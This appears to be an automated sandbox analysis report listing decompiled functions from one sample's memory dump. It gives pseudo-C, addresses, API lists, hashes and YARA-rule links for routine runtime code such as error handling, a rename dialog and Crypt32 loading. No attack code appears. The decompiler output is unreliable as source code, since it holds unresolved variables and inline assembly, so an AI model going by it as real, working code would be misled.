                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                            • API String ID: 0-1718035505
                            • Opcode ID: 73e8a922931dd23f814db1228e69ce15210376e5d8c15504e094220fdce3c826
                            • Instruction ID: 02bb73eb1eaeeaba3795e90cf4190c98f47fe76417d3bd265e11b7d3fca95377
                            • Opcode Fuzzy Hash: 73e8a922931dd23f814db1228e69ce15210376e5d8c15504e094220fdce3c826
                            • Instruction Fuzzy Hash: 3601D671B5227A6B4F209EE85C946F6239EAA06B56320463AEA20D3510E751C882D7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F8BE2, Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E009F8BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E009FF3CA(_a8, 0xa140bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E009FF3CA(_t32, 0xa140fc, _t25) != 0) {
						if(E009FF3CA(_t32, 0xa140dc, _t25) != 0) {
							if(E009FF3CA(_t32, 0xa140ac, _t25) != 0) {
								if(E009FF3CA(_t32, 0xa1414c, _t25) != 0) {
									if(E009FF3CA(_t32, 0xa1409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}








                            0x009f8be6
                            0x009f8beb
                            0x009f8bf9
                            0x009f8bfe
                            0x009f8c10
                            0x009f8c9f
                            0x009f8c9f
                            0x009f8ca2
                            0x009f8ca4
                            0x009f8ca7
                            0x009f8caa
                            0x009f8cb6
                            0x00000000
                            0x009f8cb7
                            0x009f8c27
                            0x009f8c42
                            0x009f8c5d
                            0x009f8c78
                            0x009f8c9d
                            0x009f8cae
                            0x009f8cb1
                            0x00000000
                            0x009f8cb1
                            0x00000000
                            0x009f8c9d
                            0x009f8c7a
                            0x009f8c7d
                            0x009f8c80
                            0x009f8c84
                            0x009f8c88
                            0x00000000
                            0x009f8c88
                            0x009f8c5f
                            0x009f8c62
                            0x00000000
                            0x009f8c62
                            0x009f8c44
                            0x009f8c47
                            0x00000000
                            0x009f8c47
                            0x009f8c29
                            0x009f8c2c
                            0x00000000
                            0x009f8c2c
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memcmp
                            • String ID:
                            • API String ID: 2931989736-0
                            • Opcode ID: d0693428bf96fa9840b730a1c427935fe2d58c93e7edd39fb5d29c36474b9a8d
                            • Instruction ID: 8a9f1abdfaf310dfba81f2f6c585fc46fe00d9610417a2f17e4ffafec4315900
                            • Opcode Fuzzy Hash: d0693428bf96fa9840b730a1c427935fe2d58c93e7edd39fb5d29c36474b9a8d
                            • Instruction Fuzzy Hash: 89210A7160020EBBDB149A15DC91F7B77ACAF94788F148A29FF849A101F774ED8583A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A08516, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00A08516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xa1d6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00A07B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00A09BA9(_t25, _t36, __eflags,  *0xa1d6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00A08388(_t25, _t31, 0xa40418);
							E00A07A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00A07A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00A07AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xa1d6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00A07B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00A09BA9(_t27, _t37, __eflags,  *0xa1d6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00A08388(_t27, _t32, 0xa40418);
									E00A07A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00A07A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00A09B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00A09B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                            0x00a08516
                            0x00a08516
                            0x00a08516
                            0x00a08520
                            0x00a08522
                            0x00a08527
                            0x00a0852a
                            0x00a08538
                            0x00a0853f
                            0x00a08544
                            0x00a08547
                            0x00a0854a
                            0x00a0855c
                            0x00a08561
                            0x00a08563
                            0x00a0856e
                            0x00a08575
                            0x00a0857a
                            0x00a0857d
                            0x00a0857f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a08565
                            0x00a08565
                            0x00000000
                            0x00a08565
                            0x00a0854c
                            0x00a0854c
                            0x00a0854d
                            0x00a0854d
                            0x00a08552
                            0x00a0858d
                            0x00a0858e
                            0x00a08594
                            0x00a08599
                            0x00a0859c
                            0x00a0859d
                            0x00a0859e
                            0x00a085a5
                            0x00a085a7
                            0x00a085a9
                            0x00a085ae
                            0x00a085b1
                            0x00a085bf
                            0x00a085cb
                            0x00a085ce
                            0x00a085d1
                            0x00a085e3
                            0x00a085e8
                            0x00a085ea
                            0x00a085f5
                            0x00a085fb
                            0x00a08603
                            0x00a08605
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a085ec
                            0x00a085ec
                            0x00000000
                            0x00a085ec
                            0x00a085d3
                            0x00a085d3
                            0x00a085d4
                            0x00a085d4
                            0x00a08607
                            0x00a08608
                            0x00a08608
                            0x00a085b3
                            0x00a085b9
                            0x00a085bd
                            0x00a08610
                            0x00a08611
                            0x00a08617
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a085bd
                            0x00a0861e
                            0x00a0861e
                            0x00a0852c
                            0x00a08532
                            0x00a08536
                            0x00a08581
                            0x00a08582
                            0x00a0858c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a08536

                            APIs
                            • GetLastError.KERNEL32(?,?,00A03394,?,?,?,00A02E0F,00000050), ref: 00A0851A
                            • _free.LIBCMT ref: 00A0854D
                            • _free.LIBCMT ref: 00A08575
                            • SetLastError.KERNEL32(00000000), ref: 00A08582
                            • SetLastError.KERNEL32(00000000), ref: 00A0858E
                            • _abort.LIBCMT ref: 00A08594
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 047eae9f3adde5190eaf1460126c66cdcf24034a4407860e38c2865f31bf351f
                            • Instruction ID: 701a41af89cfa0a56a01437444689816acbabd3248178b1d0733462afe26cabf
                            • Opcode Fuzzy Hash: 047eae9f3adde5190eaf1460126c66cdcf24034a4407860e38c2865f31bf351f
                            • Instruction Fuzzy Hash: 61F04C39A8460866D301B3747D0AFAF32698FD17B1F394224F559A71D1EE38EE039228
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E009FC2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E009E12D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0xa3de34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0xa3de34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0xa3de34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                            0x009fc2a8
                            0x009fc2ad
                            0x009fc2b2
                            0x009fc2b7
                            0x009fc2cf
                            0x009fc32f
                            0x00000000
                            0x009fc331
                            0x009fc2d1
                            0x009fc2d7
                            0x009fc31c
                            0x009fc322
                            0x009fc32d
                            0x00000000
                            0x009fc32d
                            0x009fc2dc
                            0x009fc2eb
                            0x00000000
                            0x009fc2eb
                            0x009fc2e1
                            0x009fc2e4
                            0x009fc308
                            0x009fc30e
                            0x009fc2f1
                            0x009fc2f2
                            0x00000000
                            0x009fc2f2
                            0x009fc2e9
                            0x009fc2ef
                            0x00000000
                            0x009fc2ef
                            0x00000000

                            APIs
                              • Part of subcall function 009E12D7: GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                              • Part of subcall function 009E12D7: SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            • EndDialog.USER32(?,00000001), ref: 009FC2F2
                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 009FC308
                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 009FC322
                            • SetDlgItemTextW.USER32(?,00000068), ref: 009FC32D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemText$DialogWindow
                            • String ID: RENAMEDLG
                            • API String ID: 445417207-3299779563
                            • Opcode ID: c0d42e361a78409c08c31baee27d3a6f5a1702c94e752af16c8cd66d9ff7b1cd
                            • Instruction ID: d5b219313c424a1c49b32144832f4478154096ccee5cde416b861ef3c9430040
                            • Opcode Fuzzy Hash: c0d42e361a78409c08c31baee27d3a6f5a1702c94e752af16c8cd66d9ff7b1cd
                            • Instruction Fuzzy Hash: 8001F17368022CBAD6119AE9AE44FBA7B6CE75AB80F108415F301B6190C2A2EC069765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A06B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00A06B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0xa12260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E009FE203(_t12, _v8 ^ _t22);
			}








                            0x00a06b7f
                            0x00a06b86
                            0x00a06b89
                            0x00a06b8d
                            0x00a06b98
                            0x00a06ba0
                            0x00a06bb1
                            0x00a06bb5
                            0x00a06bbc
                            0x00a06bc2
                            0x00a06bc2
                            0x00a06bc4
                            0x00a06bc9
                            0x00a06bce
                            0x00a06bce
                            0x00a06be1

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A06B29,00000003,?,00A06AC9,00000003,00A1A800,0000000C,00A06C20,00000003,00000002), ref: 00A06B98
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A06BAB
                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A06B29,00000003,?,00A06AC9,00000003,00A1A800,0000000C,00A06C20,00000003,00000002,00000000), ref: 00A06BCE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: ed92929765519664b2c8155365704db2ee4480ea6cde8b8867da6d0f3f431a80
                            • Instruction ID: 3635e1148f4a67b48d8c5253c32828c661d7536cb0cd67ead85b89bbeef6bb2c
                            • Opcode Fuzzy Hash: ed92929765519664b2c8155365704db2ee4480ea6cde8b8867da6d0f3f431a80
                            • Instruction Fuzzy Hash: 15F04471A4121DBBCB159FD4DC09BDEBFB8EB08715F004164F905E6190DB749E55CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EE7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009EE7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E009EFCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                            0x009ee7e4
                            0x009ee7ea
                            0x009ee7f1
                            0x009ee7f6
                            0x009ee7fa
                            0x009ee80f
                            0x009ee812
                            0x009ee818
                            0x009ee818
                            0x009ee81b
                            0x00000000
                            0x009ee81b
                            0x009ee820

                            APIs
                              • Part of subcall function 009EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009EFD18
                              • Part of subcall function 009EFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EE7F6,Crypt32.dll,?,009EE878,?,009EE85C,?,?,?,?), ref: 009EFD3A
                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009EE802
                            • GetProcAddress.KERNEL32(00A27350,CryptUnprotectMemory), ref: 009EE812
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                            • API String ID: 2141747552-1753850145
                            • Opcode ID: 09b16170dd9e6bd9c4737b7f3c1b639a3a2a647e0d83bdefb52cedeff5dc3b78
                            • Instruction ID: a637f87d656b783bb037bc6b83f1e7b6cffac788caaa26ff239522be93e1da37
                            • Opcode Fuzzy Hash: 09b16170dd9e6bd9c4737b7f3c1b639a3a2a647e0d83bdefb52cedeff5dc3b78
                            • Instruction Fuzzy Hash: 79E04FB0900683BADB019B759808741FBA4BF54700B10C966B424D3595DBB4D8B1CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A07389, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E00A07389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xa1d668; // 0xda86b1c8
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00A069A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E009FDB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E009FDB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E009FDB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00A0AC29(_t56);
						_t40 = E00A07A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00A0AC29(_t56);
						E00A07A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xa1d668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                            0x00a07389
                            0x00a07393
                            0x00a07397
                            0x00a07399
                            0x00a0739d
                            0x00a073a7
                            0x00a073b8
                            0x00a073bd
                            0x00a073bf
                            0x00a073c1
                            0x00a073c3
                            0x00a073c5
                            0x00a073c9
                            0x00a07483
                            0x00a07491
                            0x00a07493
                            0x00a07498
                            0x00a0749f
                            0x00a074a1
                            0x00a074af
                            0x00a074be
                            0x00a074c1
                            0x00a074c3
                            0x00000000
                            0x00a074c4
                            0x00a073d1
                            0x00a073d6
                            0x00a073db
                            0x00a073dd
                            0x00a073dd
                            0x00a073df
                            0x00a073e4
                            0x00a073e8
                            0x00a073e8
                            0x00a073eb
                            0x00a0740a
                            0x00a0740a
                            0x00a0740c
                            0x00a0740f
                            0x00a07418
                            0x00a0741b
                            0x00a07420
                            0x00a07423
                            0x00a07428
                            0x00000000
                            0x00000000
                            0x00a0742a
                            0x00000000
                            0x00a073ed
                            0x00a073ed
                            0x00a073ef
                            0x00a073f8
                            0x00a073fb
                            0x00a07400
                            0x00a07403
                            0x00a07408
                            0x00a07432
                            0x00a07435
                            0x00a07437
                            0x00a0743a
                            0x00a07442
                            0x00a07448
                            0x00a0744f
                            0x00a07451
                            0x00a07459
                            0x00a07468
                            0x00a0746c
                            0x00a0746e
                            0x00a07471
                            0x00000000
                            0x00000000
                            0x00a07473
                            0x00a07476
                            0x00a07478
                            0x00a07478
                            0x00a07479
                            0x00a0747b
                            0x00a0747e
                            0x00000000
                            0x00a07478
                            0x00000000
                            0x00a07408
                            0x00a073eb
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 9f96d0fcefe4b4e657114228bd13f4765c6fa4f1a2c2fb30308f5edf1c581168
                            • Instruction ID: b1aa72d9dc8a60f45d1766a34f2ef58b7effb1a055a4978f881ac8e624f8b0a3
                            • Opcode Fuzzy Hash: 9f96d0fcefe4b4e657114228bd13f4765c6fa4f1a2c2fb30308f5edf1c581168
                            • Instruction Fuzzy Hash: DD41DF72E003089FDB10DF78D981A6EB7B6EF89714F1685A8E515EB281DB31BD01CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0ABA6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00A0ABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00A0AB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00A07A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00A07A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                            0x00a0abb5
                            0x00a0abbb
                            0x00a0ac13
                            0x00a0ac13
                            0x00a0abbd
                            0x00a0abbe
                            0x00a0abc3
                            0x00a0abcc
                            0x00a0abd2
                            0x00a0abd8
                            0x00a0abdd
                            0x00000000
                            0x00a0abdf
                            0x00a0abe5
                            0x00a0abea
                            0x00a0ac08
                            0x00a0ac02
                            0x00a0ac02
                            0x00a0ac04
                            0x00a0ac04
                            0x00a0ac0b
                            0x00a0ac10
                            0x00a0abdd
                            0x00a0ac17
                            0x00a0ac1a
                            0x00a0ac1a
                            0x00a0ac28

                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 00A0ABAF
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A0ABD2
                              • Part of subcall function 00A07A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A02FA6,?,0000015D,?,?,?,?,00A04482,000000FF,00000000,?,?), ref: 00A07ABC
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A0ABF8
                            • _free.LIBCMT ref: 00A0AC0B
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A0AC1A
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: 54d39fd63ace7b1dbfdfc9bbdc6138a8bc42d1afbb38a282c26ddba4937e458f
                            • Instruction ID: 755e65d0174eb8c0f57168207426b80d3328caadbc693c3fb09ce9120bebe70f
                            • Opcode Fuzzy Hash: 54d39fd63ace7b1dbfdfc9bbdc6138a8bc42d1afbb38a282c26ddba4937e458f
                            • Instruction Fuzzy Hash: F5017572B017197FB32157F67C4CDBF796DDAC6BA03164129F904D6181DA71CD0282B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0859A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00A0859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xa1d6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00A07B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00A09BA9(_t13, _t17, __eflags,  *0xa1d6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00A08388(_t13, _t16, 0xa40418);
